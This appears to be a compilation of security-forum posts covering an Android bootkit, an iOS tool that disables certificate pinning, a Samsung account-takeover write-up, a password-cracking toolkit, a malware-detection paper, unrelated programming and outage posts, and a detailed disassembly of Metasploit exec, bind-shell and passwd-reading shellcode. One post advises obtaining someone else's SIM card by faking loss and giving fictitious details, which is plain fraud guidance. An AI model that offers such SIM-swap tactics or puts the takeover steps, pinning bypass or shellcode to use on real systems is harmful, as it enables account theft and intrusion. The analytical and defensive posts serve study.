Oldboot.
You can download it from: http://msoftdl.360.cn/mobilesafe/shouji360/360safesis/OldbootKiller_20140117.apk This tool deeply and precisely scans Android devices for the presence of Oldboot and its variants. We have developed a new defense method in it which can effectively disable all of Oldboot's malicious behaviors. Besides using our security tool to detect and disable it, we also suggest that users: Check for updates to this tool regularly; we may add the ability to detect or clean further variants. If it finds Oldboot on your phone, please report your phone's information and the samples to us; this will help us a lot. You can also try to re-flash your device with its original stock ROM; after flashing, Oldboot should be completely removed. Since only devices with modified firmware are infected by Oldboot, if our tool finds it, you can also contact your reseller directly for customer service. We also suggest installing the 360 Mobile Security application and using its cloud detection capability to protect your mobile phone and tablet. [h=2]Discussion[/h] Before we found Oldboot, the most famous Android malware widely considered a rootkit was a variant of the DroidKungfu family. It gains root permission through system vulnerabilities, remounts the system partition, replaces some executable files in it, and rewrites system configuration files. It also tries to run malicious code in the early stages of the system's boot to avoid being cleaned by antivirus applications. However, there are many differences between DroidKungfu and Oldboot. Firstly, Oldboot's infection method isn't simply remounting the system partition and changing files like DroidKungfu, but physically operating on the device's disk (through flashing or dd). Secondly, Oldboot can't be removed or repaired at the file system level, but DroidKungfu can be.
Lastly, this attack method, which exploits the boot partition's RAM disk property, can easily be developed into more advanced file-system-level hiding. We believe Oldboot creates a totally new malware attack method on Android. Through physical access or disk-level operations, future Android malware can similarly write itself to the boot partition and modify the init.rc script to gain a very early launch priority with high running permission, both to avoid being cleaned by antivirus solutions and to effectively hide itself. As the first bootkit found on Android, Oldboot has symbolic significance. We will closely follow further developments of this kind of attack. —— (media contacts: xiaozihang@360.cn) Sursa: Oldboot: the first bootkit on Android | 360????
  7. [h=1]iOS SSL Kill Switch[/h] Blackbox tool to disable SSL certificate validation - including certificate pinning - within iOS Apps. [h=2]Description[/h] Once installed on a jailbroken device, iOS SSL Kill Switch patches low-level SSL functions within the Secure Transport API, including SSLSetSessionOption() and SSLHandshake() in order to override and disable the system's default certificate validation as well as any kind of custom certificate validation (such as certificate pinning). It was successfully tested against the Twitter, Facebook, Square and Apple App Store apps; all of them implement certificate pinning. iOS SSL Kill Switch was initially released at Black Hat Vegas 2012. For more technical details on how it works, see iOS SSL Kill Switch v0.5 Released | In Security [h=2]Installation[/h] Users should first download the latest pre-compiled Debian package available in the release section of the project page at: https://github.com/iSECPartners/ios-ssl-kill-switch/releases The tool was tested on iOS7 running on an iPhone 5S. [h=3]Dependencies[/h] iOS SSL Kill Switch will only run on a jailbroken device. Using Cydia, make sure the following packages are installed: dpkg MobileSubstrate PreferenceLoader Sursa: https://github.com/iSECPartners/ios-ssl-kill-switch
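The core trick, swapping out a validation routine at runtime so that pinning checks always pass, can be illustrated with a tiny Python analog. The Transport class and "pinned-cert" value are invented for illustration; the real tweak patches Secure Transport C functions via MobileSubstrate:

```python
# Conceptual analog of the SSL Kill Switch idea: replace a validation
# method at runtime so every certificate -- pinned or not -- is
# accepted. All names here are made up; nothing below is iOS code.
class Transport:
    PINNED = "pinned-cert"

    def validate(self, cert):
        # stands in for certificate-pinning logic
        return cert == self.PINNED

t = Transport()
before = t.validate("attacker-cert")        # rejected by "pinning"

# the "kill switch": patch the method on the class at runtime
Transport.validate = lambda self, cert: True
after = t.validate("attacker-cert")         # now accepted
```

Because the hook lives below the app's own pinning code, the app never notices that validation has been short-circuited; that is exactly why patching at the Secure Transport layer defeats even custom pinning.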
8. Boot-Repair-Disk, the 'must-have' rescue CD !
Here is THE Rescue Disk that you should keep close to your computer !
- runs the Boot-Repair rescue tool automatically at start-up
- also contains the OS-Uninstaller tool
- repairs recent (UEFI) computers as well as old PCs
HOW TO GET AND USE THE DISK:
(1) DOWNLOAD BOOT-REPAIR-DISK,
(2) Then burn it to a CD or put it on a USB key via Unetbootin,
(3) Insert the Boot-Repair-Disk and reboot the PC,
(4) Choose your language,
(5) Connect to the internet if possible,
(6) Click "Recommended repair",
(7) Reboot the PC
--> solves the majority of bootsector/GRUB/MBR problems
GET HELP: by Email (boot.repair ATT gmail DOT com)
HELP THE PROJECT: Translate, or Donate (Paypal account boot.repair@gmail.com)
Sursa: boot-repair-disk / Home / Home
9. Yes, that's exactly what I was thinking of when my SIM card got damaged. To make it look more "real", you can take an Orange SIM card, scratch it until it no longer works, and ask them to replace it. But I think the better option is the one with the lost phone, because in that case "someone else may have used the SIM card in the meantime". PS: Don't rely on this. At least at Orange, when they replace your SIM card, the jerks FORCE you to sign up for a 3-month (or longer) subscription, and you need your ID card for that. In other words, if the real owner comes in and complains, they might find out who did this to them. Try to get away without showing an ID and give some fictitious details. Well, with those "fictitious" details I think you can get into "document forgery" territory and run into legal problems, so think about whether it's worth it.
10. Rapid Object Detection in .NET By Huseyin Atasoy, 25 Jan 2014 Introduction The most popular and fastest implementation of the Viola-Jones object detection algorithm is undoubtedly the one in OpenCV. But OpenCV requires wrapper classes to be usable from .NET languages, and .NET Bitmap objects have to be converted to the IplImage format before they can be used with OpenCV. Moreover, programs that use OpenCV depend on all the OpenCV libraries and their wrappers. These are not problems when OpenCV's functions are used; but if we only need to detect objects on a Bitmap, it isn't worth making our programs dependent on all the OpenCV libraries and wrappers... I have written a library (HaarCascadeClassifier.dll) that makes object detection possible in .NET without any other library requirement. It is an open source project that contains an implementation of the Viola-Jones object detection algorithm. The library uses haar cascades generated by OpenCV (XML files) to detect particular objects such as faces. It can be used for object detection purposes, or simply to understand the algorithm and how its parameters affect the result or the speed. Background In fact, my purpose is to share HaarCascadeClassifier.dll and its usage, so I will only summarize the algorithm. The algorithm of Viola and Jones doesn't use pixels directly to detect objects. It uses rectangular features that are called "haar-like features". These features can be represented using 2, 3, or 4 rectangles. Articol: http://www.codeproject.com/Articles/436521/Rapid-Object-Detection-in-NET
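Haar-like features are cheap to evaluate because each rectangle sum reduces to four lookups in a precomputed integral image. A minimal Python sketch of the idea (written for illustration, not taken from the library itself):

```python
def integral_image(img):
    """Summed-area table with a zero row/column of padding:
    ii[y][x] holds the sum of img over rows < y and columns < x."""
    h, w = len(img), len(img[0])
    ii = [[0] * (w + 1) for _ in range(h + 1)]
    for y in range(h):
        row_sum = 0
        for x in range(w):
            row_sum += img[y][x]
            ii[y + 1][x + 1] = ii[y][x + 1] + row_sum
    return ii

def rect_sum(ii, x, y, w, h):
    """Sum of the w x h rectangle with top-left corner (x, y), in O(1)."""
    return ii[y + h][x + w] - ii[y][x + w] - ii[y + h][x] + ii[y][x]

def two_rect_feature(ii, x, y, w, h):
    """Horizontal two-rectangle haar-like feature: left half minus
    right half of a w x h window (w must be even)."""
    half = w // 2
    return rect_sum(ii, x, y, half, h) - rect_sum(ii, x + half, y, half, h)

# A 4x2 "image" that is bright on the left, dark on the right:
img = [[1, 1, 0, 0],
       [1, 1, 0, 0]]
ii = integral_image(img)
feature = two_rect_feature(ii, 0, 0, 4, 2)   # strong response on the edge
```

The constant-time rectangle sum is what lets the cascade evaluate thousands of candidate windows per frame.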
11. [h=3]Today’s outage for several Google services[/h]Earlier today, most Google users who use logged-in services like Gmail, Google+, Calendar and Documents found they were unable to access those services for approximately 25 minutes. For about 10 percent of users, the problem persisted for as much as 30 minutes longer. Whether the effect was brief or lasted the better part of an hour, please accept our apologies—we strive to make all of Google’s services available and fast for you, all the time, and we missed the mark today. The issue has been resolved, and we’re now focused on correcting the bug that caused the outage, as well as putting more checks and monitors in place to ensure that this kind of problem doesn’t happen again. If you’re interested in the technical explanation for what occurred and how it was fixed, read on. At 10:55 a.m. PST this morning, an internal system that generates configurations—essentially, information that tells other systems how to behave—encountered a software bug and generated an incorrect configuration. The incorrect configuration was sent to live services over the next 15 minutes, caused users’ requests for their data to be ignored, and those services, in turn, generated errors. Users began seeing these errors on affected services at 11:02 a.m., and at that time our internal monitoring alerted Google’s Site Reliability Team. Engineers were still debugging 12 minutes later when the same system, having automatically cleared the original error, generated a new correct configuration at 11:14 a.m. and began sending it; errors subsided rapidly starting at this time. By 11:30 a.m. the correct configuration was live everywhere and almost all users’ service was restored. With services once again working normally, our work is now focused on (a) removing the source of failure that caused today’s outage, and (b) speeding up recovery when a problem does occur. We'll be taking the following steps in the next few days: 1.
Correcting the bug in the configuration generator to prevent recurrence, and auditing all other critical configuration generation systems to ensure they do not contain a similar bug. 2. Adding additional input validation checks for configurations, so that a bad configuration generated in the future will not result in service disruption. 3. Adding additional targeted monitoring to more quickly detect and diagnose the cause of service failure. Posted by Ben Treynor, VP Engineering Sursa: Official Blog: Today’s outage for several Google services
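Step 2, validating configurations before they reach live services, is the kind of guard that can be sketched in a few lines. The config shape below (service/backend/timeout_ms) is invented for illustration; the point is that a generated config failing basic invariants is rejected, and the last known-good one keeps serving:

```python
# Sketch of a "validate before you push" guard for generated configs.
# The keys and invariants are hypothetical, not Google's actual schema.
REQUIRED_KEYS = {"service", "backend", "timeout_ms"}

def validate_config(cfg):
    errors = []
    missing = REQUIRED_KEYS - cfg.keys()
    if missing:
        errors.append("missing keys: %s" % sorted(missing))
    if not cfg.get("backend"):
        errors.append("backend must be non-empty")
    if cfg.get("timeout_ms", 0) <= 0:
        errors.append("timeout_ms must be positive")
    return errors

def push_config(candidate, live):
    """Apply the candidate only if it validates; otherwise keep serving
    the last known-good config."""
    errors = validate_config(candidate)
    return (candidate, errors) if not errors else (live, errors)

good = {"service": "gmail", "backend": "be-1", "timeout_ms": 500}
bad = {"service": "gmail", "backend": "", "timeout_ms": 0}

live, _ = push_config(good, None)
live, errors = push_config(bad, live)   # rejected: last good config stays
```

In the incident described above, the bad configuration was shipped for 15 minutes before services errored; a gate like this moves the failure from serving time to generation time.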
12. [h=1]Compiling C# Code at Runtime[/h]By Lumír L? Kojecký, 25 Jan 2014 [h=2]Introduction[/h] Sometimes it is very useful to compile code at runtime. Personally, I use this feature mostly in these two cases: Simple web tutorials – writing a small piece of code into a TextBox control and executing it, instead of having to own or run an IDE. User-defined functions – I have written an application for symbolic regression with a simple configuration file where the user can choose some of my predefined functions (sin, cos, etc.). The user can also simply write his own mathematical expression with basic knowledge of the C# language. If you want to use this feature, you don’t have to install any third-party libraries. All functionality is provided by the .NET Framework in the Microsoft.CSharp and System.CodeDom.Compiler namespaces. Articol: http://www.codeproject.com/Tips/715891/Compiling-Csharp-Code-at-Runtime
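For comparison, Python's closest built-in analog of this runtime compilation is the compile()/exec() pair; the user-supplied source below is just an example of a user-defined mathematical expression:

```python
# Compile a user-supplied source string at runtime and call into it,
# the same idea the article implements with the C# compiler services.
source = "def f(x):\n    return x * x + 1\n"

namespace = {}
code = compile(source, "<user-code>", "exec")  # syntax check + bytecode
exec(code, namespace)                          # defines f in namespace

result = namespace["f"](6)                     # call the compiled code
```

As with the C# version, anything compiled this way runs with the host program's full privileges, so user input should only be compiled when it is trusted.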
13. Samsung.com Account Takeover Vulnerability Write-up First of all let me say this: Hurray! They fixed it! After contacting Samsung multiple times I thought they’d completely blown me off about fixing this bug, but it looks patched (hopefully!). EDIT: Samsung contacted me and said thanks for the report of the vulnerability. They seemed sincerely interested in fixing the problem – quite the opposite of my initial impression with them (their initial impression of me must’ve been odd considering I’m pretty sick with a cold at the time of this writing). The Vulnerability All Samsung.com accounts can be taken over due to an issue with character removal after authentication. When you register at New URL you can add extra spaces to the end of your account name and it will be registered as a separate account altogether. Alone this is not a big issue (other than perhaps spamming an email address by making multiple accounts with additional spaces after them). However, upon navigating to a Samsung subdomain such as Samsung US | TVs - Tablets - Smartphones - Cameras - Laptops - Refrigerators these trailing spaces are scrubbed from your username. Once this happens and you navigate back to Samsung.com you are authenticated as just the regular email address without any trailing spaces – effectively taking over your target’s account. So if your username was originally “admin@samsung.com<SPACE><SPACE>”, after visiting Samsung US | TVs - Tablets - Smartphones - Cameras - Laptops - Refrigerators it would be scrubbed to “admin@samsung.com”. Apparently scrubbing isn’t always a good thing (the security puns don’t get worse than that!) More Detailed instructions (Now patched, at least for shop.us.samsung.com): 1. Register an account at Samsung.com with the email address of a target, use Tamper Data or another HTTP intercept tool and add trailing spaces to the username. 2. Complete the account registration process 3.
Navigate to “shop.us.samsung.com”, ex: http://shop.us.samsung.com/store?Action=DisplayCustomerServiceOrderSearchPage&Locale-en_US&SiteID=samsung 4. Navigate back to the main Samsung.com domain, ex: Galaxy Note 10.1- 2014 Edition 5. Proceed to attempt to add items to your cart and go to checkout page 6. Notice the account details and cards on file are those of your target Sadly because this isn’t a Samsung TV there is no bug bounty for this exploit, but oh well. Proof of Concept Video Sursa: Samsung.com Account Takeover Vulnerability Write-up | The Hacker Blog
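The whole bug class reduces to normalizing usernames in one place but not the other. A toy Python model of both the buggy and the fixed registration path (the class and account names are invented):

```python
# Toy model of the Samsung bug: registration stores the raw username,
# so "victim@samsung.com  " (trailing spaces) is accepted as a "new"
# account; when a subdomain later scrubs trailing spaces, the attacker's
# identity collides with the victim's. The fix: normalize once, at
# registration, before the uniqueness check.
class Accounts:
    def __init__(self):
        self.db = {}

    def register_buggy(self, username):
        if username in self.db:
            raise ValueError("taken")
        self.db[username] = {"owner": username}

    def register_fixed(self, username):
        username = username.strip()          # normalize BEFORE checking
        if username in self.db:
            raise ValueError("taken")
        self.db[username] = {"owner": username}

buggy = Accounts()
buggy.register_buggy("victim@samsung.com")
buggy.register_buggy("victim@samsung.com  ")   # attacker's "new" account
scrubbed = "victim@samsung.com  ".strip()
collides = scrubbed in buggy.db                # attacker resolves to victim

fixed = Accounts()
fixed.register_fixed("victim@samsung.com")
try:
    fixed.register_fixed("victim@samsung.com  ")
    fixed_blocked = False
except ValueError:
    fixed_blocked = True
```

The general lesson: every identifier should be canonicalized exactly once, at the trust boundary, so no later component ever sees two spellings of the same identity.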
14. [h=2]PACK – Password Analysis & Cracking Kit[/h] PACK (Password Analysis and Cracking Toolkit) is a collection of utilities developed to aid in the analysis of password lists in order to enhance password cracking through pattern detection of masks, rules, character sets and other password characteristics. The toolkit generates valid input files for the Hashcat family of password crackers. Before using PACK, you must establish selection criteria for your password lists. Since we are looking to analyze the way people create their passwords, we must obtain as large a sample of leaked passwords as possible. One such excellent list is based on the RockYou.com compromise. This list is both large and diverse enough to give good results for common passwords used on similar sites (e.g. social networking). The analysis obtained from this list may not work for organizations with specific password policies, so the sample input you select should be as close to your target as possible. In addition, try to avoid lists based on already-cracked passwords, as they will bias the statistics toward the rules and masks used by whoever cracked the list, rather than actual users. Please note this tool does not, and is not created to, crack passwords – it just aids the analysis of password sets so you can focus your cracking more accurately/efficiently/effectively. You can download PACK here: PACK-0.0.4.tar.gz Or read more here. Sursa: PACK - Password Analysis & Cracking Kit - Darknet - The Darkside
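The mask analysis PACK performs can be approximated in a few lines: map each character to a hashcat mask class (?l, ?u, ?d, ?s) and rank mask frequencies across the sample. A minimal sketch with made-up sample passwords, not PACK's actual code:

```python
from collections import Counter

def mask_of(password):
    """Map every character of a password to its hashcat mask class."""
    out = []
    for ch in password:
        if ch.islower():
            out.append("?l")
        elif ch.isupper():
            out.append("?u")
        elif ch.isdigit():
            out.append("?d")
        else:
            out.append("?s")
    return "".join(out)

def top_masks(passwords, n=3):
    """Rank the most common masks in a password sample."""
    return Counter(mask_of(p) for p in passwords).most_common(n)

sample = ["password1", "Monkey12", "letmein!", "dragon99", "Summer12"]
ranked = top_masks(sample)
```

Feeding the highest-frequency masks to hashcat's mask attack first is exactly how this kind of analysis "focuses your cracking", covering the most probable keyspace before the exhaustive one.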
15. MARD: A Framework for Metamorphic Malware Analysis and Real-Time Detection Shahid Alam Department of Computer Science University of Victoria, BC, V8P5C2 E-mail: salam@cs.uvic.ca November 11, 2013 Introduction and Motivation End point security is often the last defense against a security threat. An end point can be a desktop, a server, a laptop, a kiosk or a mobile device that connects to a network (Internet). Recent statistics by the ITU (International Telecommunications Union) [40] show that the number of Internet users (i.e. people connecting to the Internet using these end points) in the world increased from 20% in 2006 to 35% (almost 2 billion in total) in 2011. A study carried out by Symantec about the impacts of cybercrime reports that worldwide losses due to malware attacks and phishing between July 2011 and July 2012 were $110 billion [26]. According to the 2011 Symantec Internet security threat report [25] there was an 81% increase in malware attacks over 2010, and 403 million new malware samples were created, a 41% increase over 2010. In 2012 there was a 42% increase in malware attacks over 2011. Web-based attacks increased by 30 percent in 2012. With these increases and the anticipated future increases, these end points pose a new security challenge [56] to security professionals and researchers in industry and in academia, who must devise new methods and techniques for malware detection and protection. There are numerous definitions in the literature of malware, also called malicious code, which includes viruses, worms, spyware and trojans. Here I am going to use one of the earliest definitions, by Gary McGraw and Greg Morrisett [49]: Malicious code is any code added, changed, or removed from a software system in order to intentionally cause harm or subvert the intended function of the system. A malware carries out activities such as setting up a back door for a bot, setting up a keyboard logger, stealing personal information, etc.
Antimalware software detects and neutralizes the effects of malware. There are two basic detection techniques [39]: anomaly-based and signature-based. An anomaly-based detection technique uses knowledge of the behavior of a normal program to decide whether the program under inspection is malicious or not. A signature-based detection technique uses the characteristics of a malicious program to decide whether the program under inspection is malicious or not. Each technique can be applied statically (before the program executes), dynamically (during or after the program's execution) or both statically and dynamically (hybrid). Download: http://webhome.cs.uvic.ca/~salam/PhD/TR-MARD.pdf
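The signature-based technique described above can be illustrated with a toy byte-pattern scanner. The signature name and pattern here are invented; real engines use far richer signatures (wildcards, entry-point offsets, hashes):

```python
# Toy signature-based detector: flag a sample if it contains any known
# byte pattern. The family name and pattern below are hypothetical.
SIGNATURES = {
    "Example.Dropper": bytes.fromhex("6a0b5899"),
}

def scan(blob):
    """Return the names of all signatures found in the byte blob."""
    return [name for name, sig in SIGNATURES.items() if sig in blob]

benign = b"\x90" * 32
infected = b"\x90" * 8 + bytes.fromhex("6a0b5899") + b"\x00" * 8
```

Exact byte matching is also why metamorphic malware, the subject of this framework, defeats naive signatures: rewriting its own code between generations changes the bytes without changing the behavior.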
16. Assignment five is about analyzing three different shellcodes, created with msfpayload for Linux/x86. linux/x86/exec I chose the linux/x86/exec shellcode as the first example. With: $ msfpayload linux/x86/exec cmd="ls" R | ndisasm -u - it is possible to disassemble the shellcode: 00000000 6A0B push byte +0xb 00000002 58 pop eax 00000003 99 cdq 00000004 52 push edx 00000005 66682D63 push word 0x632d 00000009 89E7 mov edi,esp 0000000B 682F736800 push dword 0x68732f 00000010 682F62696E push dword 0x6e69622f 00000015 89E3 mov ebx,esp 00000017 52 push edx 00000018 E803000000 call dword 0x20 0000001D 6C insb 0000001E 7300 jnc 0x20 00000020 57 push edi 00000021 53 push ebx 00000022 89E1 mov ecx,esp 00000024 CD80 int 0x80 I will now comment on the relevant lines of the shellcode. 00000000 6A0B push byte +0xb 00000002 58 pop eax EAX is set to 0xb = 11. This is the syscall number for execve: $ grep 11 /usr/include/i386-linux-gnu/asm/unistd_32.h #define __NR_execve 11 ... SNIP ... 00000003 99 cdq 00000004 52 push edx Set EDX to zero and push it onto the stack as a terminator. 00000005 66682D63 push word 0x632d This pushes “-c” onto the stack. 00000009 89E7 mov edi,esp Move the stack pointer to EDI, so EDI points to “-c”. 0000000B 682F736800 push dword 0x68732f 00000010 682F62696E push dword 0x6e69622f 00000015 89E3 mov ebx,esp Push /bin/sh onto the stack and move the stack pointer to EBX; EBX now points to “/bin/sh”. It can be seen that the ls command is not executed directly: a shell is called with the -c option. From the bash man page: “-c string If the -c option is present, then commands are read from string. If there are arguments after the string, they are assigned to the positional parameters, starting with $0.” 00000017 52 push edx Push some zeros again. 00000018 E803000000 call dword 0x20 This one jumps to 0x20.
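That CALL is what smuggles the command string past the disassembler: it hops over the data at 0x1d while pushing the data's address, which later ends up in execve's argv. Using the exact payload bytes from the listing above, the embedded string can be recovered mechanically (a quick Python sketch):

```python
import struct

# The disassembly misreads the bytes at 0x1d as instructions; they are
# really the command string. The CALL at 0x18 (e8 03 00 00 00) jumps 3
# bytes forward, skipping the data while leaving its address on the
# stack. Payload bytes are transcribed from the ndisasm listing above.
shellcode = bytes.fromhex(
    "6a0b58995266682d6389e7682f736800682f62696e"
    "89e352e8030000006c7300575389e1cd80"
)
call_off = shellcode.index(b"\xe8")                 # the only E8 byte here
rel = struct.unpack("<i", shellcode[call_off + 1:call_off + 5])[0]
data_start = call_off + 5        # return address the CALL pushes
data_end = data_start + rel      # CALL target = first byte after the data
embedded = shellcode[data_start:data_end].rstrip(b"\x00").decode()
```

This explains why gdb's instruction-level view never "shows" the ls: the string is carried as data between the CALL and its target, not executed.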
00000020 57 push edi 00000021 53 push ebx 00000022 89E1 mov ecx,esp 00000024 CD80 int 0x80 EDI (“-c”) and EBX (“/bin/sh”) are pushed onto the stack, ESP is copied into ECX, and the function is called. Now here comes the interesting part. It is not possible to get the command “ls” from debugging with gdb alone. But the ls command (as hex: 6c 73) is in the code. 0000001D 6C insb 0000001E 7300 jnc 0x20 I think the ls is pushed onto the stack too, although the debugger does not show any of that… hmpf. So maybe libemu can help us here. For analyzing the shellcode with libemu I use: $ msfpayload linux/x86/exec cmd="ls" R | sctest -vvv -Ss 100000 -G Exec.dot The ls command should be executed. The output shows exactly how the execve call is built. ... SNIP ... [emu 0x0x8f3e088 debug ] Flags: int execve ( const char * dateiname = 0x00416fc0 => = "/bin/sh"; const char * argv[] = [ = 0x00416fb0 => = 0x00416fc0 => = "/bin/sh"; = 0x00416fb4 => = 0x00416fc8 => = "-c"; = 0x00416fb8 => = 0x0041701d => = "ls"; = 0x00000000 => none; ]; const char * envp[] = 0x00000000 => none; ) = 0; ... SNIP ... Here it can be seen that the “ls” command is on the stack too. From the Exec.dot file a diagram can be made to illustrate the program execution. dot Exec.dot -Tpng -o Exec.dot.png Exec.dot That was it for the first shellcode. linux/x86/shell_bind_tcp For the second shellcode to analyze I chose linux/x86/shell_bind_tcp.
Disassembling works as follows: $ msfpayload linux/x86/shell_bind_tcp LPORT=4444 R | ndisasm -u - 00000000 31DB xor ebx,ebx 00000002 F7E3 mul ebx 00000004 53 push ebx 00000005 43 inc ebx 00000006 53 push ebx 00000007 6A02 push byte +0x2 00000009 89E1 mov ecx,esp 0000000B B066 mov al,0x66 0000000D CD80 int 0x80 0000000F 5B pop ebx 00000010 5E pop esi 00000011 52 push edx 00000012 680200115C push dword 0x5c110002 00000017 6A10 push byte +0x10 00000019 51 push ecx 0000001A 50 push eax 0000001B 89E1 mov ecx,esp 0000001D 6A66 push byte +0x66 0000001F 58 pop eax 00000020 CD80 int 0x80 00000022 894104 mov [ecx+0x4],eax 00000025 B304 mov bl,0x4 00000027 B066 mov al,0x66 00000029 CD80 int 0x80 0000002B 43 inc ebx 0000002C B066 mov al,0x66 0000002E CD80 int 0x80 00000030 93 xchg eax,ebx 00000031 59 pop ecx 00000032 6A3F push byte +0x3f 00000034 58 pop eax 00000035 CD80 int 0x80 00000037 49 dec ecx 00000038 79F8 jns 0x32 0000003A 682F2F7368 push dword 0x68732f2f 0000003F 682F62696E push dword 0x6e69622f 00000044 89E3 mov ebx,esp 00000046 50 push eax 00000047 53 push ebx 00000048 89E1 mov ecx,esp 0000004A B00B mov al,0xb 0000004C CD80 int 0x80 And here is the output from the libemu analysis. $ msfpayload linux/x86/shell_bind_tcp LPORT=4444 R | sctest -vvv -Ss 100000 -G shell_bind_tcp.dot ... SNIP ... 
int socket ( int domain = 2; int type = 1; int protocol = 0; ) = 14; int bind ( int sockfd = 14; struct sockaddr_in * my_addr = 0x00416fc2 => struct = { short sin_family = 2; unsigned short sin_port = 23569 (port=4444); struct in_addr sin_addr = { unsigned long s_addr = 0 (host=0.0.0.0); }; char sin_zero = " "; }; int addrlen = 16; ) = 0; int listen ( int s = 14; int backlog = 0; ) = 0; int accept ( int sockfd = 14; sockaddr_in * addr = 0x00000000 => none; int addrlen = 0x00000010 => none; ) = 19; int dup2 ( int oldfd = 19; int newfd = 14; ) = 14; int dup2 ( int oldfd = 19; int newfd = 13; ) = 13; int dup2 ( int oldfd = 19; int newfd = 12; ) = 12; int dup2 ( int oldfd = 19; int newfd = 11; ) = 11; int dup2 ( int oldfd = 19; int newfd = 10; ) = 10; int dup2 ( int oldfd = 19; int newfd = 9; ) = 9; int dup2 ( int oldfd = 19; int newfd = 8; ) = 8; int dup2 ( int oldfd = 19; int newfd = 7; ) = 7; int dup2 ( int oldfd = 19; int newfd = 6; ) = 6; int dup2 ( int oldfd = 19; int newfd = 5; ) = 5; int dup2 ( int oldfd = 19; int newfd = 4; ) = 4; int dup2 ( int oldfd = 19; int newfd = 3; ) = 3; int dup2 ( int oldfd = 19; int newfd = 2; ) = 2; int dup2 ( int oldfd = 19; int newfd = 1; ) = 1; int dup2 ( int oldfd = 19; int newfd = 0; ) = 0; int execve ( const char * dateiname = 0x00416fb2 => = "/bin//sh"; const char * argv[] = [ = 0x00416faa => = 0x00416fb2 => = "/bin//sh"; = 0x00000000 => none; ]; const char * envp[] = 0x00000000 => none; ) = 0; ... SNIP ... I will analyze the relevant parts of the shellcode, using both the disassembly and the libemu output for further explanation. 00000000 31DB xor ebx,ebx 00000002 F7E3 mul ebx 00000004 53 push ebx 00000005 43 inc ebx 00000006 53 push ebx 00000007 6A02 push byte +0x2 00000009 89E1 mov ecx,esp 0000000B B066 mov al,0x66 0000000D CD80 int 0x80 First the EBX and EAX registers are filled with zeros. EBX is pushed onto the stack, then EBX is incremented to one and pushed again. After that, 2 is pushed onto the stack.
After this, the stack address is moved into ECX, and EAX is 0x66. This is the syscall number (102) for the socketcall function, which is then invoked; in this case the socket() function is executed. The corresponding libemu output: int socket ( int domain = 2; int type = 1; int protocol = 0; ) = 14; 0000000F 5B pop ebx 00000010 5E pop esi 00000011 52 push edx 00000012 680200115C push dword 0x5c110002 00000017 6A10 push byte +0x10 00000019 51 push ecx 0000001A 50 push eax 0000001B 89E1 mov ecx,esp 0000001D 6A66 push byte +0x66 0000001F 58 pop eax 00000020 CD80 int 0x80 To shorten things a little, this part calls the bind function (EAX is again the socketcall syscall 102, and this time EBX = 2 = SYS_BIND). This corresponds with the libemu output (the whole output can be seen above). int bind ( int sockfd = 14; struct sockaddr_in * my_addr = 0x00416fc2 => struct = { short sin_family = 2; unsigned short sin_port = 23569 (port=4444); struct in_addr sin_addr = { unsigned long s_addr = 0 (host=0.0.0.0); }; char sin_zero = " "; }; int addrlen = 16; ) = 0; 0x5c11 is port 4444, by the way. 00000022 894104 mov [ecx+0x4],eax 00000025 B304 mov bl,0x4 00000027 B066 mov al,0x66 00000029 CD80 int 0x80 Here EAX = 0x66 and EBX = 4, which selects the listen() function: $ less /usr/include/linux/net.h | grep 4 #define SYS_LISTEN 4 /* sys_listen(2) */ Here is the libemu output: int listen ( int s = 14; int backlog = 0; ) = 0; 0000002B 43 inc ebx 0000002C B066 mov al,0x66 0000002E CD80 int 0x80 EBX is now 5, which selects the accept() function… int accept ( int sockfd = 14; sockaddr_in * addr = 0x00000000 => none; int addrlen = 0x00000010 => none; ) = 19; 00000030 93 xchg eax,ebx 00000031 59 pop ecx 00000032 6A3F push byte +0x3f 00000034 58 pop eax 00000035 CD80 int 0x80 00000037 49 dec ecx 00000038 79F8 jns 0x32 EAX = 0x3f = 63, which is the syscall for dup2: $ grep 63 /usr/include/i386-linux-gnu/asm/unistd_32.h #define __NR_dup2 63 This procedure is repeated until ECX = 0, so every file descriptor is covered.
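That single push dword 0x5c110002 lays down the first four bytes of the sockaddr_in in one go. A quick Python check confirms that 0x5c11, read in network byte order, really is port 4444:

```python
import struct

# In memory (little-endian) the pushed dword 0x5c110002 becomes the
# bytes 02 00 11 5c: sin_family = 2 (AF_INET) followed by the port in
# network byte order.
raw = struct.pack("<I", 0x5C110002)        # bytes as they sit on the stack
family = struct.unpack("<H", raw[:2])[0]   # host-order short: AF_INET
port = struct.unpack("!H", raw[2:])[0]     # network-order short: the port
```

This byte-order flip is why the listing shows 0x5c11 while libemu reports sin_port = 23569 (0x5c11 as a host-order short) and decodes it as port 4444.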
0000003A 682F2F7368 push dword 0x68732f2f 0000003F 682F62696E push dword 0x6e69622f 00000044 89E3 mov ebx,esp 00000046 50 push eax 00000047 53 push ebx 00000048 89E1 mov ecx,esp 0000004A B00B mov al,0xb 0000004C CD80 int 0x80 Finally we have the execve call. This works pretty much as in the analysis of the linux/x86/exec shellcode. int execve ( const char * dateiname = 0x00416fb2 => = "/bin//sh"; const char * argv[] = [ = 0x00416faa => = 0x00416fb2 => = "/bin//sh"; = 0x00000000 => none; ]; const char * envp[] = 0x00000000 => none; ) = 0; I also used the debugger to analyze the shellcode, but I don't think its output adds anything here. And finally the flowchart. $ dot shell_bind_tcp.dot -Tpng -o shell_bind_tcp.dot.png shell_bind_tcp.dot So that was it for the second analysis. linux/x86/read_file So let us start by disassembling the shellcode: $ sudo msfpayload linux/x86/read_file PATH="/etc/passwd" R | ndisasm -u - 00000000 EB36 jmp short 0x38 00000002 B805000000 mov eax,0x5 00000007 5B pop ebx 00000008 31C9 xor ecx,ecx 0000000A CD80 int 0x80 0000000C 89C3 mov ebx,eax 0000000E B803000000 mov eax,0x3 00000013 89E7 mov edi,esp 00000015 89F9 mov ecx,edi 00000017 BA00100000 mov edx,0x1000 0000001C CD80 int 0x80 0000001E 89C2 mov edx,eax 00000020 B804000000 mov eax,0x4 00000025 BB01000000 mov ebx,0x1 0000002A CD80 int 0x80 0000002C B801000000 mov eax,0x1 00000031 BB00000000 mov ebx,0x0 00000036 CD80 int 0x80 00000038 E8C5FFFFFF call dword 0x2 0000003D 2F das 0000003E 657463 gs jz 0xa4 00000041 2F das 00000042 7061 jo 0xa5 00000044 7373 jnc 0xb9 00000046 7764 ja 0xac 00000048 00 db 0x00 Libemu and sctest did not work for me, so I will only look at the disassembly and debugging. First things first: the shellcode uses the JMP-CALL-POP technique. This can be seen very well by stepping through the code, but also by having a look at the disassembled code. 00000000 EB36 jmp short 0x38 Jump to address 0x38.
00000038 E8C5FFFFFF call dword 0x2
0000003D 2F das
0000003E 657463 gs jz 0xa4
00000041 2F das
00000042 7061 jo 0xa5
00000044 7373 jnc 0xb9
